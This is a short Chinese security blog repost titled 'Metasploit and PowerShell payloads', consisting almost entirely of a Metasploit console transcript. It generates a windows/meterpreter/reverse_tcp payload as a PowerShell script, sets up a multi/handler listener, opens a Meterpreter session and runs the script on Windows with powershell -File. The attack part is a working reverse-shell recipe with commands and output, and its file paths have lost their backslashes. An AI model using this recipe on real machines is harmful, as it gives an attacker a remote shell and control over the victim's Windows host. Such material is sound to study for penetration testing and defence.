Metasploit and PowerShell payloads

  • A+
所属分类:lcx
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > use windows/meterpreter/reverse_tcp
msf  payload(reverse_tcp) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  payload(reverse_tcp) > generate -t psh -f pwShell.ps1
[*] Writing 2909 bytes to pwShell.ps1...
msf  payload(reverse_tcp) > use multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.24.24.41
LHOST => 172.24.24.41
msf  exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
    LHOST     172.24.24.41     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf  exploit(handler) > exploit

[*] Started reverse handler on 172.24.24.41:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.24.24.41
[*] Meterpreter session 1 opened (172.24.24.41:4444 -> 172.24.24.41:26520) at 2012-10-10 17:09:30 +0800

meterpreter > getpid
Current pid: 5708
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1


C:UsersAdministrator>powershell -File c:metasploitmsf3pwShell.ps1
35520512
酱紫经常会卡住 最好酱紫


Windows PowerShell
版权所有 (C) 2012 Microsoft Corporation。保留所有权利。

PS C:UsersAdministrator> cd C:metasploitmsf3
PS C:metasploitmsf3> .pwShell.ps1
73662464
73662465
73662466
73662467
73662468
73662469 

转自:http://zone.wooyun.org/content/1261

文章来源于lcx.cc:Metasploit and PowerShell payloads

相关推荐: MD5散列密码不等于MD5的安全性

想了很久,标题还是水一点算了[密码学相关] xsjswt | 2015-01-08 10:00 《应用密码学 -算法、协议与C源码》是一本很好的密码学协议入门、科普书 作者并没有一开始就介绍算法的数学原理、算法如何工作这样的细节 而是从一开始就在说一个问题,使…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: